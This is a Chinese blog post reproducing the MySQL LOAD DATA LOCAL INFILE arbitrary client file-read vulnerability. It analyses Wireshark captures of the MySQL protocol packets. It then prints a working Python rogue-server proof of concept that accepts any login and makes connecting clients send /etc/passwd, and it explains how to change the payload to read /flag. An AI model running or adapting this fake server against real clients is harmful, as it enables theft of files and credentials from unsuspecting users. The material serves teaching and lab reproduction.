当前位置: 首页 > article >正文

Mysql LOAD DATA 读取客户端任意文件

复现 Mysql LOAD DATA INFILE 读取客户端任意文件漏洞

前言

MySQL 客户端和服务端通信过程中是通过对话的形式来实现的,客户端发送一个操作请求,然后服务端根据客户端发送的请求来响应客户端,在这个过程中客户端如果一个操作需要两步才能完成,那么当它发送完第一个请求过后并不会存储这个请求,而是直接丢弃,所以第二步就是根据服务端的响应来继续进行,这里服务端就可以欺骗客户端做一些事情。

但是一般的通信都是客户端发送一个 MySQL 语句然后服务器端根据这条语句查询后返回结果,也没什么可以利用的。但是 MySQL 有个语法 LOAD DATA INFILE 可以用来读取一个文件的内容并插入到表中。

97f78552234a07062d3b54bcdd80e600.png

从上图的官方文档说明可以看到,该命令既可以读取服务端的文件,也可以读取客户端的文件,这取决于 LOCAL modifier 是否给定。

读取服务端上的文件内容存入表中的 SQL 语句是:

load data infile "/etc/passwd" into table TestTable fields terminated by '分隔符';

读取客户端上的文件内容存入表中的 SQL 语句是:

load data local infile "/etc/passwd" into table TestTable fields terminated by '分隔符';

两相对比,读取客户端上的文件内容多了一个 local 关键字。

以上所描述的过程可以形象地用两个人的对话来表示:

  1. 1. 客户端:把我本地 /data/test.csv 的内容插入到 TestTable 表中去

  2. 2. 服务端:请把你本地 /data/test.csv 的内容发送给我

  3. 3. 客户端:好的,这是我本地 /data/test.cvs 的内容

  4. 4. 服务端:成功/失败

正常情况下这个流程没有问题,但是前文提到了客户端在第二次并不知道它自己前面发送了什么给服务器,所以客户端第二次要发送什么文件完全取决于服务端,如果这个服务端不正常,就有可能发生如下对话:

  1. 1. 客户端:请把我本地 /data/test.csv 的内容插入到 TestTable 表中去

  2. 2. 服务器:请把你本地 /etc/passwd 的内容发送给我

  3. 3. 客户端:好的,这是我本地 /etc/passwd 的内容

  4. 4. 服务端:成功偷取文件内容

这样服务端就非法拿到了 /etc/passwd 的文件内容!接下来开始进行这个实验,做一个恶意服务端来欺骗客户端。为了编写出伪造恶意 MySQL 服务器的 POC,必须对 MySQL 协议有足够的了解,所以接下来尝试分析一下 MySQL 协议的数据包。

MySQL 协议数据包分析

为了非法读取客户端文件,我们需要实现一个假的 MySQL 服务器。那如何实现呢?这需要我们对 MySQL 协议展开详细的分析才能做到,好在借助 Wireshark 结合 MySQL 官方文档可以帮助我们轻松分析 MySQL 协议的数据包。

我以 ubuntu 虚拟机为客户端,windows物理机为服务端,借助 Wireshark 工具捕捉两者间的 mysql 通信数据包。

客户端ip:192.168.239.129

服务端ip:192.168.1.3

客户端和服务端之间交互的 MySQL命令如下

mysql -h 192.168.1.3 -P 3306 -u root -p
use security;
load data local infile "/etc/passwd" into table users;

开启物理机的 mysql,这里注意需要设置 mysql 允许外来连接,不知道如何操作看看这篇文章

设置 MySQL 允许外部访问

c883b0ae3a6599f0af1377cb4c67b8dd.png

2.打开 wireshark,选择捕获 Vmware 相关的网卡并选择过滤 MySQL 协议,然后用虚拟机连接。

32e9aa12369f1deef165c27be56e3823.png

注意:不要使用 mysql 8.0.12 版本,否则相关的数据包显示不完整,甚至连接的用户名都显示不了,这个版本的加密可能更严格吧。

官方文档告诉我们 MySQL 协议也支持通过 TLS 进行加密和身份验证。MYSQL_TLS

那我们捕获的数据包是否进行了加密呢?稍加分析一下这些捕获的数据包就可以判断其确实使用了 TLS 进行了加密。接下来我们根据文档结合 Wireshark 捕获的数据包来进行实践论证!

连接过程数据包

运行连接命令时捕获到的数据包

mysql -h 192.168.1.3 -P 3306 -u root -p
7ce705e34c1cf89ed94b5681333fb804.png

不打算全部都细说,就以前两个数据包为例子,和官方文档对照来学习其结构。

  • 第一个数据包 Protocol::HandshakeV10 服务端到客户端

当客户端通过 MySQL 协议连接到 服务端会发生什么呢?官方文档 Protocol::Handshake 告诉我们当客户端连接到服务端时,服务端会发送一个初始的握手数据包(Initial Handshake Packet)给客户端。根据服务端的版本和配置选项,服务端会发送不同的初始数据包。

为了服务端可以支持新的协议,Initial Handshake Packet 初始的握手数据包的第一个字节被定义为协议的版本号。从 MySQL 3.21.0 版本开始,发送的是 Protocol::HandshakeV10

我采用的 MySQL 版本是 5.7.26,所以发送的就是 Protocol::HandShakeV10 ,我们可以看看文档是如何定义这个数据包的结构的:

b646ec930d8d941d240c9f3712d7a6d1.png

关于 Type 字段各个值的含义在 Integer Types 和 String Types

int<1> 就是 一个字节,string<NUL> 表示以 00 字节结尾的字符串。

273248c0363af7a8188c5a20f86ae001.png 74e69a9f4a96f54e67b636dcd6b108bc.png

我们点开 Wireshark 中服务端给客户端发送的初始数据包,从 Server Greeting 字段开始就是 payload 部分,也就是初始的握手数据包。从图中我们可以看到有协议版本、服务端的 MySQL 版本、进程 ID。这和我们上图的文档是不是完美对应上了?

9ea07d39591df069a7c06439e7eac8ce.png

Protocol::HandShakeV10 只定义了一个数据包的 payload 部分,而关于头部的定义在 MySQL Packets

8dc6adb234c7e5e5f2f5d1559c1325f5.png

和实际的数据包的对应:

payload_length:

d32a3e23c61416f115fabe1a658d502d.png

sequence_id:

459df576f32fee73310f9afe0d8553f4.png

payload:

4cf3b222a842f8496c78217de26237d7.png
image-20230110151214416

值得注意的是 Wireshark 的数据是按照小端排列的,比如数据包长度 74 对应的字段数据是 4a 00 00

其余的字段就不再分析了,大同小异。紧接着简单看看客户端给服务端的回应吧。官方文档告诉我们,如果客户端支持 SSL(Capabilities Flags & CLIENT_SSL is on and the mysql_ssl_mode of the client is not SSL_MODE_DISABLED) ,那么一个短的被称为 Protocol::SSLRequest: 的数据包会被发送,使得服务端建立一个 SSL layer 并等待来自客户端的下一个数据包。(这里你可能会感到混乱,前面不是说 TLS 吗,怎么现在变成了 SSL?其实 TLS 是升级版的 SSL,但是由于 SSL 这一术语更加常用,所以人们经常互换使用者两个术语。什么是 SSL、TLS、HTTPS)

如果不支持,那么客户端会返回 Protocol::HandshakeResponse: 。同时在任何时候,发生任何错误,客户端都会断开连接。

  • 第二个数据包 Protocol::HandshakeResponse41 客户端到服务端

根据前面的分析,这里客户端如果支持 SSL,那么会发送 Protocol::SSLRequest 数据包,否则就是Protocol::HandshakeResponse:。根据我的验证,应该发送的是 Protocol::HandshakeResponse41

感觉挺奇怪的,我觉得应该发送 SSLRequest 才是,但是其包结构却又对应不上。

e5faf0136756af0ebdd7a973312a9526.png
image-20230110155957039
c91df8854f49df7f6b184f47f630b196.png
image-20230110160009859

client_flag(4字节),包括了扩展的 Client capabilities

29e428700ba86a5a8f810e626e8de881.png
image-20230110154523933
9706a1ca5ac46bfc1e6e042c119cb143.png
image-20230110154532699

max_packet_size(4字节)

0x01000000 = 16777216

78f4364fbdbac0cd1c802db706c5ec42.png
image-20230110154621557

character_set(1字节)

787a5eb61abf97a56f905aa475488415.png
image-20230110160051396

filler(23字节)

3c59b996b1f31f696b8e824662e72002.png
image-20230110160132308

username(以 00 结尾的字符串)

6a9e8f0e1e36811b862dc0833e80157b.png
image-20230110160203395

auth_response

文档中说这是一个条件选项,当前的数据包是满足这个条件的。

6d604e635f3ae4da013e075b1ae0dc81.png
image-20230110161053756
99c7cbcb32654eb610fe71558618878a.png
image-20230110161038844

根据文档对这个字段的释义,其是一个不透明的验证响应。没想到在实际数据包中是一个密码,经过了某个哈希算法。我没有去求证 MySQL 采用什么哈希算法,

d852f9e2708c47f2cbf782c5d65c5a30.png
image-20230110161236039

接下来就不继续分析,大同小异。

这个数据包的重点在于能够表明客户端是否支持 LOAD DATA LOCAL,这是我们可以读取客户端本地文件的根本。关于这个字段的定义在:CLIENT_LOCAL_FILES

f69eea91de76284a06d47e159ea8b089.png
image-20230110152116352
a3c417407a2bade4f1199185c70dd83a.png
image-20230110152515536
  • 第三个数据包 Ok_Packet 服务端到客户端

这个数据包一看就是 Ok_Packet

79cbbd7ac1aef6bdc93f4cbceb8fc5c3.png
  • 第四个数据包 COM_QUERY 客户端到服务端

这个数据包是 COM_QUERY

57d5e07db01e6fcc63349160691f677b.png
  • 第五个数据包 Text Resultset 服务端到客户端

这个数据包是 Text Resultset

2bbdc70afb0931eb0a5442c8e1efa5a0.png
image-20230110180602484
d6d3d4c5c114182feb01ca38f225c381.png
image-20230110180306697

选择 security 数据库捕获的数据包

当客户端向服务端发送 use security 命令选择数据库时捕获到的数据包。特别多,下图并没有截完整。这一步不重要

e529195609481f86a53395c338617005.png

读取客户端文件捕获的数据包

在客户端上执行如下命令将 /etc/passwd 文件内容写入到 users 表时捕获到的数据包。

load data local infile "/etc/passwd" into table users;
48a9b5e18f66bbfe0867b048c9881bc5.png

一共就四个包,很明显第一个包是一个 COM_QUERY

这个图我不小心去读服务端的文件了,但是无伤大雅。数据包结构是一样的,而且下图我重抓啦~

ce23ed6108827a4bb25540f55b1e658c.png

糟糕的是第三个数据包由于我的物理机拒绝了访问而导致这个数据包是一个错误响应数据包。

94f45ca07e836eaa481ab5459ed93281.png

我在这里找到了解决方案

stackoverflow

连接的时候用

mysql --local-infile=1 -u root -p -h 192.168.1.3

重新抓一遍包!!

499c2bd3b5118d1e27ecb49cb5be0b71.png
  • 第一个数据包 客户端到服务端 COM_QUERY

b8e62f4d3aa6b4f1e82f2287f911e0aa.png
  • 第二个数据包 服务端到客户端 LOCAL INFILE Request

bf87d38a490ae1c9d7dbe4d8b2f2f339.png

这个数据包很重要,是构造恶意 MySQL 服务器的重点,我们需要根据这个数据包的结构书写 payload。具体地说,需要伪造的部分是 MySQL 数据包的首部和 payload 部分。还记得前面的 MySQL 数据包的结构图吗?

e6acb34789a172547b91c30e111a535a.png

对照一下上图就会发现这个 MySQL 协议数据包的头部是

0c 00 00 01

对应的 payload(不是 wireshark 的那个 Payload) 是

fb 2f 65 74 63 2f 70 61 73 73 77 64

  • 第三个数据包 客户端到服务端 COM_QUERY

上一个数据包服务端给客户端发送LOAL INFILE Request 的响应后,客户端发给服务端的这一个数据就包含了 /etc/passwd 文件的内容。

8f990dc3e9ad16f600043e24544d42e4.png
  • 第四个数据包 服务端到客户端 Ok_Packet

4d7552ffe33cb10645a1f3c5066d087a.png

客户端经过两个请求,成功的将自己的 /etc/passwd 文件插入到表 users 中,

根据我们前面所说,客户端在发送完第一个请求之后并不会存储这个请求,而是直接丢弃。所以第二步是根据服务端的响应来进行,这里服务器就可以欺骗客户端做一些事情(改变第二个数据包的响应内容)。有了以上的铺垫,POC 的编写并不困难。只需要完成连接过程,然后修改第二个数据包的响应内容就好。

POC

我懒得完整编写 POC 了,所以从网上抄了一个。值得一提的是这个 POC 并不标准,在连接建立过程中发送的数据并没有包含数据包首部,而发送 payload 的时候又包含了首部。(同时从编写的代码来看好像编写者并没有对数据包的构成有一个准确的认识 hhh,当然也有可能是我错了)

  1. 1. 客户端发送请求数据包

  2. 2. 服务端发送 Mysql 的 Greet 与 banner 信息

  3. 3. 客户端发送认证请求(用户名与密码)

  4. 4. 这里面我们当然要保证无论输入什么密码都是可以的

  5. 5. 获取到文件信息直接输出

#!/usr/bin/python
#coding: utf8
import socket
# linux :
#filestring = "/etc/passwd"
# windows:
#filestring = "C:\Windows\system32\drivers\etc\hosts"
HOST = "0.0.0.0" # open for eeeeveryone! ^_^
PORT = 3306
BUFFER_SIZE = 1024
#1 Greeting
greeting = "\x5b\x00\x00\x00\x0a\x35\x2e\x36\x2e\x32\x38\x2d\x30\x75\x62\x75\x6e\x74\x75\x30\x2e\x31\x34\x2e\x30\x34\x2e\x31\x00\x2d\x00\x00\x00\x40\x3f\x59\x26\x4b\x2b\x34\x60\x00\xff\xf7\x08\x02\x00\x7f\x80\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x68\x69\x59\x5f\x52\x5f\x63\x55\x60\x64\x53\x52\x00\x6d\x79\x73\x71\x6c\x5f\x6e\x61\x74\x69\x76\x65\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x00"
#2 Accept all authentications
authok = "\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00"
#3 Payload
#数据包长度
payloadlen = "\x0c" #这里明显有问题啦,因为文档告诉我们数据包的长度是用三个字节表示的
padding = "\x00\x00"
payload = payloadlen + padding +  "\x01\xfb\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64" #这里又把序列号拼在了 数据包的 payload部分
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((HOST, PORT))
s.listen(1)
while True:
    conn, addr = s.accept()
    print 'Connection from:', addr
    conn.send(greeting)
    while True:
        data = conn.recv(BUFFER_SIZE)
        print " ".join("%02x" % ord(i) for i in data)
        conn.send(authok)
        data = conn.recv(BUFFER_SIZE)
        conn.send(payload)
        print "[*] Payload send!"
        data = conn.recv(BUFFER_SIZE)
        if not data: break
        print "Data received:", data
        break
    # Don't leave the connection open.
    conn.close()

在服务器运行以上脚本,并在客户端连接

095c870b09198f46fe4fea32128f496b.png

收到 /etc/passwd 文件内容

ecdf566eb019f23c353b275be0b7f682.png

读取 /flag

如果想要读取 /flag 如何修改 payload 呢?这是一个很简单的问题,因为已知了这是一个 LOCAL INFILE Request 数据包,所以只需要构造一下数据包首部和 payload 部分即可(保持 POC 中其余字段不变)。

首部包括三个字节长的长度字段,一个字节长的序列号。

payload 部分是一个字节长的包类型 0xFB 和 xx 字节长的文件名

e11fb6b9c809a76d4b7f3fa35bd8ba4c.png

现在真正的数据部分是/flag,转换成十六进制为 2f666c6167,其拼接上一个字节的包类型 0xFB 就凑成了 payload 部分:fb 2f 66 6c 61 67 ,故首部中的长度字段值为 0x06。

0eafce26b3dc37c9e59ed53bbbae2d73.png 7dab0976701a46cdd2208731c2753ad8.png ed5883b9d2d790f4af2a8d2769d6627a.png

好用的自动化工具

https://github.com/fnmsd/MySQL_Fake_Server

参考链接

MySQL服务端恶意读取客户端文件漏洞分析并使用Golang编写简易蜜罐

Mysql LOAD DATA读取客户端任意文件漏洞复现(原理分析)

https://blog.csdn.net/qq_53755216/article/details/118223185

原创稿件征集

征集原创技术文章中,欢迎投递

投稿邮箱:edu@antvsion.com

文章类型:黑客极客技术、信息安全热点安全研究分析等安全相关

通过审核并发布能收获200-800元不等的稿酬。

更多详情,点我查看!

75cad1828b15666c31ae3ebe460012fd.gif

靶场实操,戳“阅读原文“


http://www.kler.cn/a/6888.html

相关文章:

  • HTML and CSS Support HTML 和 CSS 支持
  • Debezium-MySqlConnectorTask
  • C指针之舞——指针探秘之旅
  • 微博短链接平台-项目测试用例设计(Xmind)
  • Http常⻅见请求/响应头content-type内容类型讲解(笔记)
  • Python中的with语句
  • AQS之ReentrantLock独占锁源码解析
  • top 输出中涉及到的一些参数的解释
  • SonarQube安装教程
  • 2023年noc指导教师认证测评参考试题
  • 重学Java设计模式-结构型模式-代理模式
  • Vue3通透教程【十一】初探TypeScript
  • 离散制造企业数字化转型难点问题
  • 【C++从0到1】7.C++中标识符的命名
  • 蓝桥杯刷题冲刺 | 倒计时4天
  • 【QsLog动态库的编译和使用】
  • 【Git】版本控制之基础用法
  • 如何低成本实现微前端架构?
  • arm-himix100-linux-gcc no such file or directory 解决办法
  • 华为OD机试用JS实现 -【查找树中的元素 or 查找二叉树节点】(2023-Q2 押题)
  • 1-ELK+ Elasticsearch+head+kibana、企业内部日志分析系统
  • Android列表实现单选、多选、全选、取消、删除
  • kubernetes各个条件下使用nginx-ingress进行路由映射
  • git 删除提交记录
  • flex布局:输入框布局demo
  • 多国拟发ChatGPT禁令 关“野兽”的笼子要来了?